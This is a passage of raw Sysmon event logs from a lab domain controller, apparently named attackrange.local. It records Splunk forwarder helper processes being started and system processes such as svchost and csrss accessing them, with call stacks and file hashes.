Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014152Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:19.941{08A6967A-49FF-6000-8B05-000000009A01}5160C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014162Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:47.285{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014161Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:47.285{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014160Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:47.285{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014178Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:15.942{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4A37-6000-8D05-000000009A01}5324C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014177Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:15.942{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014176Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:15.942{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014175Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:15.942{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014174Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:15.942{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014173Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:15.942{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4A37-6000-8D05-000000009A01}5324C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014172Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:15.942{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4A37-6000-8D05-000000009A01}5324C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014171Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:15.942{08A6967A-4A37-6000-8D05-000000009A01}5324C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014170Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:15.270{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4A37-6000-8C05-000000009A01}7132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014169Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:15.270{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014168Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:15.270{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014167Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:15.270{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014166Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:15.270{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014165Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:15.270{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4A37-6000-8C05-000000009A01}7132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014164Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:15.270{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4A37-6000-8C05-000000009A01}7132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014163Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:15.270{08A6967A-4A37-6000-8C05-000000009A01}7132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014187Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:16.582{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4A38-6000-8E05-000000009A01}2940C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014186Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:16.582{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014185Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:16.582{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014184Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:16.582{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014183Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:16.582{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014182Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:16.582{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4A38-6000-8E05-000000009A01}2940C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014181Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:16.582{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4A38-6000-8E05-000000009A01}2940C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 